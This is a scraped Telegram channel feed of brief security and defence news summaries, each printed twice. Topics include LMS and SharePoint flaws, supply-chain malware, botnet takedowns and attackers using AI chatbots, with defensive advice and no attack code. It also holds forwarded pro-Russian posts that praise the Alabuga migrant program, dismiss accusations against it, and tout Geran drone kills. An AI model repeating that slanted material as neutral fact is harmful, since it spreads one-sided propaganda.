🔍 KnowledgeDeliver flaw exploited as a zero-day to install web shells
Attackers are leveraging a zero-day in the KnowledgeDeliver learning management system to deploy web shells on vulnerable servers, enabling unauthorized remote access and control.
Operationally, organizations with internet-facing LMS deployments should map exposed instances, retain and review logs, and inspect web roots for unfamiliar scripts while restricting external access (e.g., via WAF or VPN). Web shell footholds enable command execution, lateral movement, and data theft, making rapid containment, credential hygiene, and segmentation reviews priority actions until hardening is complete.
🛰️ Open sources - closed narratives
@sitreports
Attackers are leveraging a zero-day in the KnowledgeDeliver learning management system to deploy web shells on vulnerable servers, enabling unauthorized remote access and control.
Operationally, organizations with internet-facing LMS deployments should map exposed instances, retain and review logs, and inspect web roots for unfamiliar scripts while restricting external access (e.g., via WAF or VPN). Web shell footholds enable command execution, lateral movement, and data theft, making rapid containment, credential hygiene, and segmentation reviews priority actions until hardening is complete.
🛰️ Open sources - closed narratives
@sitreports
📡 Malware Found in Laravel-Lang Composer Packages After Git Tag Poisoning Attack
Attackers injected malware into four Laravel-Lang Composer packages by rewriting hundreds of Git tags, using a tag-poisoning technique. Numerous Laravel apps may be exposed.
This is a software supply-chain breach via version metadata. Prioritize audits for altered tag history, pin to commit hashes, verify signatures, and roll back affected builds. Review CI caches and watch for unexpected package updates.
🛰️ Open sources - closed narratives
@sitreports
Attackers injected malware into four Laravel-Lang Composer packages by rewriting hundreds of Git tags, using a tag-poisoning technique. Numerous Laravel apps may be exposed.
This is a software supply-chain breach via version metadata. Prioritize audits for altered tag history, pin to commit hashes, verify signatures, and roll back affected builds. Review CI caches and watch for unexpected package updates.
🛰️ Open sources - closed narratives
@sitreports
⚡ Microsoft Patches SharePoint RCE Flaw CVE-2026-45659 Across Server Versions
Microsoft has released security updates for SharePoint Server, addressing a remote code execution vulnerability tracked as CVE-2026-45659 (CVSS 8.8). Fixes apply across supported server versions, closing a high-severity path to arbitrary code execution.
On‑prem SharePoint admins should fast‑track these patches, prioritizing internet-facing servers. Validate update success, review external access routes and service account scopes, and watch for anomalous activity to contain RCE exposure.
🛰️ Open sources - closed narratives
@sitreports
Microsoft has released security updates for SharePoint Server, addressing a remote code execution vulnerability tracked as CVE-2026-45659 (CVSS 8.8). Fixes apply across supported server versions, closing a high-severity path to arbitrary code execution.
On‑prem SharePoint admins should fast‑track these patches, prioritizing internet-facing servers. Validate update success, review external access routes and service account scopes, and watch for anomalous activity to contain RCE exposure.
🛰️ Open sources - closed narratives
@sitreports
🔍 Critical Memcached SASL Flaw Lets Attackers Infer Usernames
A critical vulnerability in Memcached allows attackers to determine which usernames exist in SASL-enabled deployments. The flaw enables identification of valid accounts without verifying passwords.
Operationally, exposure of confirmed usernames lowers barriers for credential stuffing, brute-force attempts, and targeted phishing against services relying on SASL. Internet-exposed and multi-tenant environments are most at risk, as pre-validating accounts streamlines follow-on intrusion and complicates detection.
🛰️ Open sources - closed narratives
@sitreports
A critical vulnerability in Memcached allows attackers to determine which usernames exist in SASL-enabled deployments. The flaw enables identification of valid accounts without verifying passwords.
Operationally, exposure of confirmed usernames lowers barriers for credential stuffing, brute-force attempts, and targeted phishing against services relying on SASL. Internet-exposed and multi-tenant environments are most at risk, as pre-validating accounts streamlines follow-on intrusion and complicates detection.
🛰️ Open sources - closed narratives
@sitreports
📡 Charter confirms data breach after ShinyHunters extortion threat
U.S. telecom Charter Communications has confirmed a data breach following an extortion threat by the ShinyHunters group to leak stolen data unless a ransom is paid.
Confirmation signals adversary access and a shift from intrusion to pressure operations. This raises risk of phishing using breach themes, credential reuse attempts, and closer regulatory attention. Organizations should review vendor exposure, tighten access controls, and prepare customer communications while monitoring for ShinyHunters-branded leak channels.
🛰️ Open sources - closed narratives
@sitreports
U.S. telecom Charter Communications has confirmed a data breach following an extortion threat by the ShinyHunters group to leak stolen data unless a ransom is paid.
Confirmation signals adversary access and a shift from intrusion to pressure operations. This raises risk of phishing using breach themes, credential reuse attempts, and closer regulatory attention. Organizations should review vendor exposure, tighten access controls, and prepare customer communications while monitoring for ShinyHunters-branded leak channels.
🛰️ Open sources - closed narratives
@sitreports
🤖 Microsoft Defender can now automatically isolate hacked endpoints
Microsoft is testing a Microsoft Defender for Endpoint feature that automatically isolates compromised devices to hinder lateral movement. It severs network access while keeping management channels live for investigation and recovery.
This compresses response time and shifts containment from manual playbooks to policy. Teams should validate coverage on critical assets, tune isolation thresholds, and define override paths to limit disruption.
🛰️ Open sources - closed narratives
@sitreports
Microsoft is testing a Microsoft Defender for Endpoint feature that automatically isolates compromised devices to hinder lateral movement. It severs network access while keeping management channels live for investigation and recovery.
This compresses response time and shifts containment from manual playbooks to policy. Teams should validate coverage on critical assets, tune isolation thresholds, and define override paths to limit disruption.
🛰️ Open sources - closed narratives
@sitreports
📡 Air Force looks to accelerate F-15 EW upgrades at new ‘Speedline’
The Air Force Life Cycle Management Center has opened a dedicated facility, the Speedline, to accelerate installation of modern electronic warfare and survivability upgrades on F-15E Strike Eagles.
Accelerated retrofits cut depot time, raise availability, and field upgraded jets sooner. A single line standardizes configurations and training baselines, bolstering survivability and mission endurance in contested airspace.
🛰️ Open sources - closed narratives
@sitreports
The Air Force Life Cycle Management Center has opened a dedicated facility, the Speedline, to accelerate installation of modern electronic warfare and survivability upgrades on F-15E Strike Eagles.
Accelerated retrofits cut depot time, raise availability, and field upgraded jets sooner. A single line standardizes configurations and training baselines, bolstering survivability and mission endurance in contested airspace.
🛰️ Open sources - closed narratives
@sitreports
🔍 Banned Russian Submunitions Found After Mali's Military Announces Airstrikes
Unexploded banned Russian submunitions were identified after Mali's military announced airstrikes, linking the discovery to the period immediately following declared operations.
Operationally, the find indicates cluster-type ordnance in the strike area, elevating contamination and casualty risks and requiring clearance. It also intensifies scrutiny of munition supply, strike records, and preserved evidence for attribution and compliance.
🛰️ Open sources - closed narratives
@sitreports
Unexploded banned Russian submunitions were identified after Mali's military announced airstrikes, linking the discovery to the period immediately following declared operations.
Operationally, the find indicates cluster-type ordnance in the strike area, elevating contamination and casualty risks and requiring clearance. It also intensifies scrutiny of munition supply, strike records, and preserved evidence for attribution and compliance.
🛰️ Open sources - closed narratives
@sitreports
📡 Canada's Telesat eyes secure Italian satellite connectivity contract, sources say
Canada's Telesat is pursuing a contract to provide secure satellite connectivity for Italy, with discussions reported to be underway.
A deal would signal Italy’s intent to harden national communications and broaden procurement options via commercial satellite services, placing a Canadian operator in a sensitive European role and shaping interoperability, resilience, and supplier diversification in government networks.
🛰️ Open sources - closed narratives
@sitreports
Canada's Telesat is pursuing a contract to provide secure satellite connectivity for Italy, with discussions reported to be underway.
A deal would signal Italy’s intent to harden national communications and broaden procurement options via commercial satellite services, placing a Canadian operator in a sensitive European role and shaping interoperability, resilience, and supplier diversification in government networks.
🛰️ Open sources - closed narratives
@sitreports
🔍 The LA Metro Attack Wasn't Hacktivism. It Was a State Operation With a Costume On.
A new assessment states the LA Metro attack was not a hacktivist action but a state-run operation using a hacktivist façade.
Operationally, this highlights how state actors exploit activist branding to gain deniability, complicate attribution, and shape public perception. For defenders of critical transit systems, it raises the bar for threat validation, incident communications, and response calibration when "hacktivism" may mask state direction.
🛰️ Open sources - closed narratives
@sitreports
A new assessment states the LA Metro attack was not a hacktivist action but a state-run operation using a hacktivist façade.
Operationally, this highlights how state actors exploit activist branding to gain deniability, complicate attribution, and shape public perception. For defenders of critical transit systems, it raises the bar for threat validation, incident communications, and response calibration when "hacktivism" may mask state direction.
🛰️ Open sources - closed narratives
@sitreports
🔍 Glassworm botnet disrupted after resilient C2 infrastructure takedown
The Glassworm botnet has been disrupted following the takedown of a resilient command-and-control infrastructure. The action interrupts control pathways, degrading coordination across infected hosts.
Operationally, removing core C2 nodes constrains tasking and update propagation, increasing fragmentation and creating a short window for remediation and telemetry collection. Defenders should audit endpoints, purge persistence, and tighten egress controls while monitoring for residual traffic.
🛰️ Open sources - closed narratives
@sitreports
The Glassworm botnet has been disrupted following the takedown of a resilient command-and-control infrastructure. The action interrupts control pathways, degrading coordination across infected hosts.
Operationally, removing core C2 nodes constrains tasking and update propagation, increasing fragmentation and creating a short window for remediation and telemetry collection. Defenders should audit endpoints, purge persistence, and tighten egress controls while monitoring for residual traffic.
🛰️ Open sources - closed narratives
@sitreports
📡 Grandoreiro Malware and BTMOB RAT Campaigns Target Windows and Android Users
Active Grandoreiro banking malware and BTMOB RAT campaigns are targeting Windows and Android users across Europe and Latin America in 2026. The Grandoreiro and BTMOB campaigns elevate banking-malware risk for consumers and enterprises.
Operationally, cross-platform reach complicates defense and widens credential-theft risk across mixed fleets. Financial services and mobile-centric teams should tighten endpoints, boost anti-fraud monitoring, and rehearse rapid isolation.
🛰️ Open sources - closed narratives
@sitreports
Active Grandoreiro banking malware and BTMOB RAT campaigns are targeting Windows and Android users across Europe and Latin America in 2026. The Grandoreiro and BTMOB campaigns elevate banking-malware risk for consumers and enterprises.
Operationally, cross-platform reach complicates defense and widens credential-theft risk across mixed fleets. Financial services and mobile-centric teams should tighten endpoints, boost anti-fraud monitoring, and rehearse rapid isolation.
🛰️ Open sources - closed narratives
@sitreports
🔍 Malicious npm Package Stole Files From Claude AI User Directory via GitHub
A malicious npm package stole files from a Claude AI user directory and moved them to GitHub. The case spotlights an npm supply-chain vector targeting local AI data.
Operational significance: developer machines that use Claude alongside GitHub-linked workflows are at risk when dependencies turn rogue. Reduce exposure by pinning and auditing packages, constraining filesystem and token scopes, and monitoring unexpected Git actions or file exfiltration.
🛰️ Open sources - closed narratives
@sitreports
A malicious npm package stole files from a Claude AI user directory and moved them to GitHub. The case spotlights an npm supply-chain vector targeting local AI data.
Operational significance: developer machines that use Claude alongside GitHub-linked workflows are at risk when dependencies turn rogue. Reduce exposure by pinning and auditing packages, constraining filesystem and token scopes, and monitoring unexpected Git actions or file exfiltration.
🛰️ Open sources - closed narratives
@sitreports
🤖 GPU mining malware spreads via SEO poisoning, AI chatbots
Actors are pushing GPU mining malware through SEO poisoning and AI chatbot suggestions, funneling users to attacker-run sites.
Operationally, the search-and-chat vector widens delivery beyond email, heightening cryptojacking exposure for GPU-capable endpoints and developer machines. Treat chatbot links as untrusted, tighten web filtering on search-driven downloads, and monitor anomalous GPU use.
🛰️ Open sources - closed narratives
@sitreports
Actors are pushing GPU mining malware through SEO poisoning and AI chatbot suggestions, funneling users to attacker-run sites.
Operationally, the search-and-chat vector widens delivery beyond email, heightening cryptojacking exposure for GPU-capable endpoints and developer machines. Treat chatbot links as untrusted, tighten web filtering on search-driven downloads, and monitor anomalous GPU use.
🛰️ Open sources - closed narratives
@sitreports
⚡ CERT-In professes 12-hour patching for AI-assisted attacks
India’s national incident response agency CERT-In calls for a 12-hour patching window to address AI-assisted attacks, urging swift mitigation.
A 12-hour target compresses response cycles, pushing patch orchestration, asset prioritization, and containment to first-line tasks. Pre-stage critical updates, streamline approvals, and automate detection-to-remediation to limit exposure as AI speeds discovery and exploitation.
🛰️ Open sources - closed narratives
@sitreports
India’s national incident response agency CERT-In calls for a 12-hour patching window to address AI-assisted attacks, urging swift mitigation.
A 12-hour target compresses response cycles, pushing patch orchestration, asset prioritization, and containment to first-line tasks. Pre-stage critical updates, streamline approvals, and automate detection-to-remediation to limit exposure as AI speeds discovery and exploitation.
🛰️ Open sources - closed narratives
@sitreports
Forwarded from Rybar in English
healthy human migration on the example of the Alabuga Special Economic Zone
Russia's migration policy tends to face persistent and active criticism. And let's be honest, in most cases it's justified. However, there are plenty of examples of positive labor migration as well – take the "Alabuga-Start" program for attracting and Russifying female migrants from Africa.
We've already told you about the useful experience of such a policy, which made it possible to quickly fill the labor shortage in not particularly popular regions, and about how the West tried to stretch the truth, accusing Alabuga's leadership of recruiting people for the SMO.
#Africa #multiculturalism #Russia
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤖 SOCOM seeks autonomous warfare proving ground
U.S. Special Operations Command (SOCOM) is seeking to establish a dedicated proving ground for autonomous warfare capabilities. The move aims to provide a centralized venue for structured testing, evaluation, and training.
Operationally, a single site would standardize trials, safety gates, and performance metrics for human‑machine teaming, improving interoperability and shortening the path from prototypes to deployable capability. Consolidated test data would also support requirements definition, doctrine updates, and risk management across components.
🛰️ Open sources - closed narratives
@sitreports
U.S. Special Operations Command (SOCOM) is seeking to establish a dedicated proving ground for autonomous warfare capabilities. The move aims to provide a centralized venue for structured testing, evaluation, and training.
Operationally, a single site would standardize trials, safety gates, and performance metrics for human‑machine teaming, improving interoperability and shortening the path from prototypes to deployable capability. Consolidated test data would also support requirements definition, doctrine updates, and risk management across components.
🛰️ Open sources - closed narratives
@sitreports
Media is too big
VIEW IN TELEGRAM
When Cost Ratios Do the Talking
The price tag makes the picture even more brutal. A single Gepard with ammunition, overhaul and logistics easily runs into tens of millions of dollars; a Geran‑2 that destroys it costs in the range of 30–70 thousand dollars.
Every successful hit turns a highly expensive Western air‑defense asset into scrap metal using a relatively cheap loitering munition. The cost‑effectiveness ratio is clearly skewed, and not in favor of NATO hardware.
This is why Russia can afford to use Gerans not only against fixed infrastructure, but also against mobile, defended targets like air‑defense systems. Losing a few drones along the way is acceptable when the exchange rate is one Gepard per several “flying mopeds”.
For Western taxpayers, the equation looks much darker. Year by year, they pay for boutique systems that are traded away against mass‑produced munitions in a game where economics slowly grind down Ukraine’s air‑defense potential.
@sitreports
The price tag makes the picture even more brutal. A single Gepard with ammunition, overhaul and logistics easily runs into tens of millions of dollars; a Geran‑2 that destroys it costs in the range of 30–70 thousand dollars.
Every successful hit turns a highly expensive Western air‑defense asset into scrap metal using a relatively cheap loitering munition. The cost‑effectiveness ratio is clearly skewed, and not in favor of NATO hardware.
This is why Russia can afford to use Gerans not only against fixed infrastructure, but also against mobile, defended targets like air‑defense systems. Losing a few drones along the way is acceptable when the exchange rate is one Gepard per several “flying mopeds”.
For Western taxpayers, the equation looks much darker. Year by year, they pay for boutique systems that are traded away against mass‑produced munitions in a game where economics slowly grind down Ukraine’s air‑defense potential.
@sitreports
📡 Troops’ phones leaked location data to foreign adversaries
Troops’ phones leaked location data to foreign adversaries, compromising positional awareness sourced from personal devices.
This exposure enables mapping of unit patterns, correlating movements with operations, and increasing risks from targeting, interception, and coercion. Mitigation hinges on strict device policies, hardened geolocation settings, minimized app permissions, and clear separation of personal electronics from mission areas.
🛰️ Open sources - closed narratives
@sitreports
Troops’ phones leaked location data to foreign adversaries, compromising positional awareness sourced from personal devices.
This exposure enables mapping of unit patterns, correlating movements with operations, and increasing risks from targeting, interception, and coercion. Mitigation hinges on strict device policies, hardened geolocation settings, minimized app permissions, and clear separation of personal electronics from mission areas.
🛰️ Open sources - closed narratives
@sitreports
🤖 GreyVibe hackers use ChatGPT, Gemini to power cyberattacks
GreyVibe hackers are leveraging ChatGPT and Gemini to drive offensive operations, signaling that mainstream AI assistants are now embedded in active cyberattack workflows.
Operationally, adversary access to public LLMs compresses timelines and raises output quality at scale. Defenders should pivot toward behavior-led detection, monitor automation and access patterns around AI services, and treat polished content as routine rather than exceptional.
🛰️ Open sources - closed narratives
@sitreports
GreyVibe hackers are leveraging ChatGPT and Gemini to drive offensive operations, signaling that mainstream AI assistants are now embedded in active cyberattack workflows.
Operationally, adversary access to public LLMs compresses timelines and raises output quality at scale. Defenders should pivot toward behavior-led detection, monitor automation and access patterns around AI services, and treat polished content as routine rather than exceptional.
🛰️ Open sources - closed narratives
@sitreports